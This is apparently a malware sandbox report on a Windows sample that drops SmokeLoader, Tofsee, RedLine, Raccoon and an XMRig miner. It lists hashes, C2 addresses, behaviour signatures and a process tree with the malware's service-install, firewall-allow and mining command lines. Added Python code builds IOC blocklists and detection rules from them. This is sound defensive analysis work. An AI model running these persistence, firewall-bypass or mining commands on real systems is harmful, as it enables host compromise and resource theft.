Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    20-11-2021 16:06

General

  • Target

    83b62ccce9d742a53e5fe0016fab9ded.exe

  • Size

    320KB

  • MD5

    83b62ccce9d742a53e5fe0016fab9ded

  • SHA1

    4ec481fc61cb5fa86296975000c25e0eec7376b9

  • SHA256

    c41ecbb533f6da059e2996cc5065805d2038ba4d0e670d57939b30b109bd6eba

  • SHA512

    5116417b66769ee983a2b27ad611b1488e7643e6189fc4c2322a76658ecd6c70edc557faf5021a366cc135e96f4014ba25486f486fd203437d9f123e449714a4

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

redline

C2

185.159.80.90:38637

Extracted

Family

raccoon

Version

1.8.3-hotfix

Botnet

ddf183af4241e3172885cf1b2c4c1fb4ee03d05a

Attributes
  • url4cnc

    http://91.219.236.27/capibar

    http://5.181.156.92/capibar

    http://91.219.236.207/capibar

    http://185.225.19.18/capibar

    http://91.219.237.227/capibar

    https://t.me/capibar

rc4.plain
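
The four configs above yield C2 indicators in three shapes (full URLs, bare domains, and an `ip:port` pair), and one of them (`t.me`) is a legitimate service used only as a dead-drop. The block below is an added example, not part of the sandbox report: it normalizes those indicators into one typed table and matches observed destinations against it. The indicator strings are copied from the Malware Config section; the function names, the table layout and the `SHARED_HOSTS` list are assumptions made for this illustration.

```python
"""Normalize the C2 indicators extracted above into a typed, deduplicated
IOC table and match observed destinations against it.

Added example, not part of the sandbox report.  Indicator strings are
copied from the Malware Config section; function names, table layout and
SHARED_HOSTS are assumptions made for this illustration."""
import ipaddress
import re
from urllib.parse import urlsplit

# Raw config values, copied from the report, keyed by family.
EXTRACTED = {
    "smokeloader": ["http://host-file-host6.com/", "http://host-host-file8.com/"],
    "tofsee": ["quadoil.ru", "lakeflex.ru"],
    "redline": ["185.159.80.90:38637"],
    "raccoon": [
        "http://91.219.236.27/capibar",
        "http://5.181.156.92/capibar",
        "http://91.219.236.207/capibar",
        "http://185.225.19.18/capibar",
        "http://91.219.237.227/capibar",
        "https://t.me/capibar",
    ],
}

# Legitimate services abused as dead-drop resolvers: never block the host,
# match on the exact path instead.  (Assumed list; only t.me appears above.)
SHARED_HOSTS = {"t.me"}

_HOSTPORT = re.compile(r"^(?P<host>[^:/\s]+):(?P<port>\d{1,5})$")


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def normalize(raw):
    """Return (kind, host, port, path) for one raw indicator.

    kind is 'ip' or 'domain'.  A URL gets its scheme's default port when
    none is given; a bare domain gets port None (matches any port)."""
    if "://" in raw:
        u = urlsplit(raw)
        host = u.hostname or ""
        port = u.port or (443 if u.scheme == "https" else 80)
        path = u.path
    else:
        m = _HOSTPORT.match(raw)
        host = m.group("host") if m else raw
        port = int(m.group("port")) if m else None
        path = ""
    return ("ip" if _is_ip(host) else "domain", host.lower(), port, path)


def build_ioc_table(extracted=EXTRACTED):
    """Map each host to its kind, the families using it, and the ports/paths seen."""
    table = {}
    for family, raws in extracted.items():
        for raw in raws:
            kind, host, port, path = normalize(raw)
            entry = table.setdefault(
                host, {"kind": kind, "families": set(), "ports": set(), "paths": set()})
            entry["families"].add(family)
            if port is not None:
                entry["ports"].add(port)
            if path:
                entry["paths"].add(path)
    return table


def match_connection(dst_host, dst_port, table, path=None):
    """Return the set of families whose C2 matches a destination, else empty.

    Indicators with a known port require that port; bare domains match any.
    Hosts in SHARED_HOSTS only match when the request path matches too."""
    host = dst_host.lower()
    entry = table.get(host)
    if entry is None:
        return set()
    if entry["ports"] and dst_port not in entry["ports"]:
        return set()
    if host in SHARED_HOSTS and (path is None or path not in entry["paths"]):
        return set()
    return set(entry["families"])
```

The path check on `t.me` is the caveat worth keeping when turning a config dump into blocklists: the Raccoon config lists the Telegram URL alongside raw IPs, but only the IPs are safe to block outright.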

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Commonly seen in ransomware, though not conclusive on its own.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\83b62ccce9d742a53e5fe0016fab9ded.exe
    "C:\Users\Admin\AppData\Local\Temp\83b62ccce9d742a53e5fe0016fab9ded.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1164
    • C:\Users\Admin\AppData\Local\Temp\83b62ccce9d742a53e5fe0016fab9ded.exe
      "C:\Users\Admin\AppData\Local\Temp\83b62ccce9d742a53e5fe0016fab9ded.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1192
  • C:\Users\Admin\AppData\Local\Temp\8A45.exe
    C:\Users\Admin\AppData\Local\Temp\8A45.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Users\Admin\AppData\Local\Temp\8A45.exe
      C:\Users\Admin\AppData\Local\Temp\8A45.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:436
  • C:\Users\Admin\AppData\Local\Temp\9915.exe
    C:\Users\Admin\AppData\Local\Temp\9915.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ifvqrlb\
      2⤵
        PID:1184
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\skcjizkr.exe" C:\Windows\SysWOW64\ifvqrlb\
        2⤵
          PID:2012
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ifvqrlb binPath= "C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe /d\"C:\Users\Admin\AppData\Local\Temp\9915.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1732
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ifvqrlb "wifi internet conection"
            2⤵
              PID:964
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ifvqrlb
              2⤵
                PID:1604
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:576
              • C:\Users\Admin\AppData\Local\Temp\A546.exe
                C:\Users\Admin\AppData\Local\Temp\A546.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1868
                • C:\Users\Admin\AppData\Local\Temp\A546.exe
                  C:\Users\Admin\AppData\Local\Temp\A546.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1548
              • C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe
                C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe /d"C:\Users\Admin\AppData\Local\Temp\9915.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1164
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:1000
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:928
              • C:\Users\Admin\AppData\Local\Temp\BC9E.exe
                C:\Users\Admin\AppData\Local\Temp\BC9E.exe
                1⤵
                • Executes dropped EXE
                PID:1760
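
The tree above shows the whole Tofsee-style install chain in the clear: a directory is created under SysWOW64, the dropped binary is moved into it, `sc.exe` registers it as an auto-start service with a benign-looking display name, `netsh` opens the firewall for `svchost.exe`, and the service then spawns an `svchost.exe` that is not a child of `services.exe` and carries an XMRig-style pool/wallet command line. The block below is an added example, not part of the sandbox report and not vendor detection content: it runs a small set of command-line rules over constructed Sysmon-style process records. The command lines are copied from the tree above; the record shape, the parent images (taken from the tree's nesting, `None` where it shows none) and the rule names are assumptions for this illustration.

```python
"""Command-line detection rules for the service-install, firewall-bypass
and miner chain shown in the process tree above, run over constructed
Sysmon-style process records.

Added example; not part of the sandbox report and not vendor detection
content.  Command lines are copied from the tree above.  Record shape,
parent images and rule names are assumptions for this illustration."""
import re

# Constructed records: (pid, parent image, image, command line).
EVENTS = [
    (1936, None, r"C:\Users\Admin\AppData\Local\Temp\9915.exe",
     r"C:\Users\Admin\AppData\Local\Temp\9915.exe"),
    (1184, r"C:\Users\Admin\AppData\Local\Temp\9915.exe", r"C:\Windows\SysWOW64\cmd.exe",
     '"C:\\Windows\\System32\\cmd.exe" /C mkdir C:\\Windows\\SysWOW64\\ifvqrlb\\'),
    (2012, r"C:\Users\Admin\AppData\Local\Temp\9915.exe", r"C:\Windows\SysWOW64\cmd.exe",
     '"C:\\Windows\\System32\\cmd.exe" /C move /Y "C:\\Users\\Admin\\AppData\\Local\\Temp\\skcjizkr.exe" C:\\Windows\\SysWOW64\\ifvqrlb\\'),
    (1732, r"C:\Users\Admin\AppData\Local\Temp\9915.exe", r"C:\Windows\SysWOW64\sc.exe",
     r'"C:\Windows\System32\sc.exe" create ifvqrlb binPath= "C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe /d\"C:\Users\Admin\AppData\Local\Temp\9915.exe\"" type= own start= auto DisplayName= "wifi support"'),
    (964, r"C:\Users\Admin\AppData\Local\Temp\9915.exe", r"C:\Windows\SysWOW64\sc.exe",
     r'"C:\Windows\System32\sc.exe" description ifvqrlb "wifi internet conection"'),
    (1604, r"C:\Users\Admin\AppData\Local\Temp\9915.exe", r"C:\Windows\SysWOW64\sc.exe",
     r'"C:\Windows\System32\sc.exe" start ifvqrlb'),
    (576, r"C:\Users\Admin\AppData\Local\Temp\9915.exe", r"C:\Windows\SysWOW64\netsh.exe",
     r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul'),
    (1164, None, r"C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe",
     r'C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe /d"C:\Users\Admin\AppData\Local\Temp\9915.exe"'),
    (1000, r"C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe", r"C:\Windows\SysWOW64\svchost.exe",
     "svchost.exe"),
    (928, r"C:\Windows\SysWOW64\svchost.exe", r"C:\Windows\SysWOW64\svchost.exe",
     "svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half"),
]

SC_CREATE = re.compile(
    r'sc\.exe"?\s+create\s+(?P<name>\S+)\s+binPath=\s*"?(?P<bin>[A-Za-z]:\\[^"]*?\.exe)', re.I)
AUTO_START = re.compile(r'\bstart=\s*auto\b', re.I)
# Service binary inside an ad-hoc subdirectory of SysWOW64 (not the directory itself).
SYSWOW64_SUBDIR = re.compile(r'^[A-Za-z]:\\Windows\\SysWOW64\\[^\\]+\\[^\\]+\.exe$', re.I)
NETSH_ADD_RULE = re.compile(r'netsh(?:\.exe)?"?\s+advfirewall\s+firewall\s+add\s+rule\b', re.I)
KV = re.compile(r'(?P<k>\w+)=\s*(?:"(?P<q>[^"]*)"|(?P<u>[^\s>]+))')
# xmrig-style arguments: -o pool:port -u wallet ... -a algorithm
MINER = re.compile(r'(?:^|\s)-o\s+(?P<pool>[\w.\-]+:\d+)\s+-u\s+(?P<wallet>\S+)'
                   r'(?:.*?\s-a\s+(?P<algo>\S+))?', re.S)
STAGING = re.compile(r'\b(?:mkdir|move)\b.*[A-Za-z]:\\Windows\\SysWOW64\\', re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower() if path else ""


def kv_args(cmd):
    """Parse key=value arguments (netsh style), honouring double quotes."""
    return {m.group("k").lower(): m.group("q") if m.group("q") is not None else m.group("u")
            for m in KV.finditer(cmd)}


def extract_miner_config(cmd):
    """Pull pool, port, wallet and algorithm out of a miner command line, or None."""
    m = MINER.search(cmd)
    if not m:
        return None
    pool, port = m.group("pool").rsplit(":", 1)
    return {"pool": pool, "port": int(port), "wallet": m.group("wallet"), "algo": m.group("algo")}


def analyze(events):
    """Return (pid, rule, detail) findings for every record that matches a rule."""
    findings = []
    for pid, parent, image, cmd in events:
        img = basename(image)
        m = SC_CREATE.search(cmd)
        if m and SYSWOW64_SUBDIR.match(m.group("bin")):
            detail = f"{m.group('name')} -> {m.group('bin')}"
            if AUTO_START.search(cmd):
                detail += " (start= auto)"
            findings.append((pid, "service_binary_in_syswow64_subdir", detail))
        if NETSH_ADD_RULE.search(cmd):
            args = kv_args(cmd)
            if args.get("action", "").lower() == "allow" and args.get("program"):
                findings.append((pid, "firewall_allow_rule_added", args["program"]))
        # Assumption the rule relies on: on a stock Windows 7 host every svchost.exe
        # is started by services.exe, so any other parent is hollowing or masquerade.
        if img == "svchost.exe" and parent and basename(parent) != "services.exe":
            findings.append((pid, "svchost_not_child_of_services", basename(parent)))
        miner = extract_miner_config(cmd)
        if miner:
            findings.append((pid, "cryptominer_cmdline",
                             f"{miner['pool']}:{miner['port']} {miner['algo']}"))
        if img == "cmd.exe" and STAGING.search(cmd):
            findings.append((pid, "staging_into_syswow64", cmd.split("/C", 1)[-1].strip()))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in analyze(EVENTS):
        print(f"PID {pid:>5}  {rule:<36} {detail}")
```

The `sc description` and `sc start` records deliberately produce no finding on their own; the signal is the `create` with a `binPath=` under a fresh SysWOW64 subdirectory plus `start= auto`, and the firewall rule that names `svchost.exe` as the program rather than the real service binary.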

              Network

MITRE ATT&CK Matrix (ATT&CK v6)

Technique (number of matching signatures) and technique ID, grouped by tactic:

  • Persistence
    New Service (1) T1050
    Modify Existing Service (1) T1031
    Registry Run Keys / Startup Folder (1) T1060
  • Privilege Escalation
    New Service (1) T1050
  • Defense Evasion
    Disabling Security Tools (1) T1089
    Modify Registry (2) T1112
  • Credential Access
    Credentials in Files (1) T1081
  • Discovery
    Query Registry (2) T1012
    System Information Discovery (2) T1082
    Peripheral Device Discovery (1) T1120
  • Collection
    Data from Local System (1) T1005

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\8A45.exe
                MD5

                183aeaff3cbbe4991d2211a59221943d

                SHA1

                b312cc8b070b6a6f588d1ad64a81a4e154efc28c

                SHA256

                3acfc103f563564c1375045c97504c574d574ba2574e2348302604274be86d59

                SHA512

                2262cf71e5ea8af1bf4e07640600385a79ea31f40c7cdbe41d9a51f0f9231254233224bd2c87c66443759156fd8f835e0aa0e3b9944ad0b87f551cdf69720beb

              • C:\Users\Admin\AppData\Local\Temp\9915.exe
                MD5

                57f3cfc15761105e6c7ba5ed880c932c

                SHA1

                874dae56e8e259aebefd1c95b31392408b6bd827

                SHA256

                faaf74e50917319bc08d449e69e6c367155e166bc5708d13e9ad808055d9b3a3

                SHA512

                d67e3bf551d4f3644cdd65ff6f04e3b31cff3fcdfac96f5df5fb1e578028e5d9d3c3bc9f83f7f23e6e20b47d25384750414cb1086f5b0e109d0b0537f773e125

              • C:\Users\Admin\AppData\Local\Temp\A546.exe
                MD5

                5e34695c9f46f1e69ce731d3b7359c88

                SHA1

                e1e5bb43f0c7556bcccc8cb698f854694bdc024a

                SHA256

                97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

                SHA512

                659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

              • C:\Users\Admin\AppData\Local\Temp\BC9E.exe
                MD5

                a93ee3be032ac2a200af6f5673ecc492

                SHA1

                a6fb35b4230ae92ae50a2f3a4e7f0ca7341e9f1c

                SHA256

                f106e2efb90c57289bbe57b3be618c063c1bc70f3eaabd2afa73e53c2168a54d

                SHA512

                d4796fda3e4de570d77ffb5dd9efa8172647832e3e2e491d12578d19b9f8de6b876b349f827050f1aa6f6121cf0a5558e4cd4e4c920a33f2f46732b1ca99e321

              • C:\Users\Admin\AppData\Local\Temp\skcjizkr.exe
                MD5

                54eaaa2c29f701c6ca7d700a2ba6a297

                SHA1

                8e1ef74537acd2b037a654ea9a2c8e8d6b3f2294

                SHA256

                d834689765659e64068594877b3f3c8553a224c36cfb820f0264e761af039730

                SHA512

                38c852d52c52b20f270a0fab6b36042defc2a1985767722f8c6695993b68f757bfa34cb00647db004606f0cefbaba0379b5cf4d93be2be120a15edbdb0aa0689

              • C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe
                MD5

                54eaaa2c29f701c6ca7d700a2ba6a297

                SHA1

                8e1ef74537acd2b037a654ea9a2c8e8d6b3f2294

                SHA256

                d834689765659e64068594877b3f3c8553a224c36cfb820f0264e761af039730

                SHA512

                38c852d52c52b20f270a0fab6b36042defc2a1985767722f8c6695993b68f757bfa34cb00647db004606f0cefbaba0379b5cf4d93be2be120a15edbdb0aa0689

              • \Users\Admin\AppData\Local\Temp\8A45.exe
                MD5

                183aeaff3cbbe4991d2211a59221943d

                SHA1

                b312cc8b070b6a6f588d1ad64a81a4e154efc28c

                SHA256

                3acfc103f563564c1375045c97504c574d574ba2574e2348302604274be86d59

                SHA512

                2262cf71e5ea8af1bf4e07640600385a79ea31f40c7cdbe41d9a51f0f9231254233224bd2c87c66443759156fd8f835e0aa0e3b9944ad0b87f551cdf69720beb

              • \Users\Admin\AppData\Local\Temp\A546.exe
                MD5

                5e34695c9f46f1e69ce731d3b7359c88

                SHA1

                e1e5bb43f0c7556bcccc8cb698f854694bdc024a

                SHA256

                97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

                SHA512

                659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

              • memory/436-67-0x0000000000402DD8-mapping.dmp
              • memory/576-102-0x0000000000000000-mapping.dmp
              • memory/928-117-0x0000000000080000-0x0000000000171000-memory.dmp
                Filesize

                964KB

              • memory/928-118-0x0000000000080000-0x0000000000171000-memory.dmp
                Filesize

                964KB

              • memory/928-122-0x000000000011259C-mapping.dmp
              • memory/964-98-0x0000000000000000-mapping.dmp
              • memory/1000-112-0x00000000000D0000-0x00000000000E5000-memory.dmp
                Filesize

                84KB

              • memory/1000-114-0x00000000000D9A6B-mapping.dmp
              • memory/1000-113-0x00000000000D0000-0x00000000000E5000-memory.dmp
                Filesize

                84KB

              • memory/1096-63-0x000000000030B000-0x000000000031C000-memory.dmp
                Filesize

                68KB

              • memory/1096-61-0x0000000000000000-mapping.dmp
              • memory/1164-116-0x0000000000400000-0x0000000002B49000-memory.dmp
                Filesize

                39.3MB

              • memory/1164-59-0x0000000000220000-0x0000000000229000-memory.dmp
                Filesize

                36KB

              • memory/1164-110-0x000000000030B000-0x000000000031C000-memory.dmp
                Filesize

                68KB

              • memory/1164-55-0x0000000002C8B000-0x0000000002C9C000-memory.dmp
                Filesize

                68KB

              • memory/1184-83-0x0000000000000000-mapping.dmp
              • memory/1192-58-0x0000000076341000-0x0000000076343000-memory.dmp
                Filesize

                8KB

              • memory/1192-57-0x0000000000402DD8-mapping.dmp
              • memory/1192-56-0x0000000000400000-0x0000000000409000-memory.dmp
                Filesize

                36KB

              • memory/1424-60-0x0000000002720000-0x0000000002736000-memory.dmp
                Filesize

                88KB

              • memory/1424-87-0x0000000003FD0000-0x0000000003FE6000-memory.dmp
                Filesize

                88KB

              • memory/1548-92-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1548-94-0x0000000000418EEA-mapping.dmp
              • memory/1548-93-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1548-96-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1548-91-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1548-99-0x00000000008D0000-0x00000000008D1000-memory.dmp
                Filesize

                4KB

              • memory/1548-90-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1548-89-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1604-100-0x0000000000000000-mapping.dmp
              • memory/1732-88-0x0000000000000000-mapping.dmp
              • memory/1760-103-0x0000000000000000-mapping.dmp
              • memory/1760-107-0x0000000000220000-0x000000000026F000-memory.dmp
                Filesize

                316KB

              • memory/1760-108-0x0000000000330000-0x00000000003BF000-memory.dmp
                Filesize

                572KB

              • memory/1760-109-0x0000000000400000-0x0000000000491000-memory.dmp
                Filesize

                580KB

              • memory/1868-80-0x0000000000350000-0x0000000000351000-memory.dmp
                Filesize

                4KB

              • memory/1868-75-0x0000000000950000-0x0000000000951000-memory.dmp
                Filesize

                4KB

              • memory/1868-72-0x0000000000000000-mapping.dmp
              • memory/1936-86-0x0000000000400000-0x0000000002B49000-memory.dmp
                Filesize

                39.3MB

              • memory/1936-81-0x0000000000220000-0x0000000000233000-memory.dmp
                Filesize

                76KB

              • memory/1936-78-0x0000000002CAB000-0x0000000002CBC000-memory.dmp
                Filesize

                68KB

              • memory/1936-70-0x0000000000000000-mapping.dmp
              • memory/2012-84-0x0000000000000000-mapping.dmp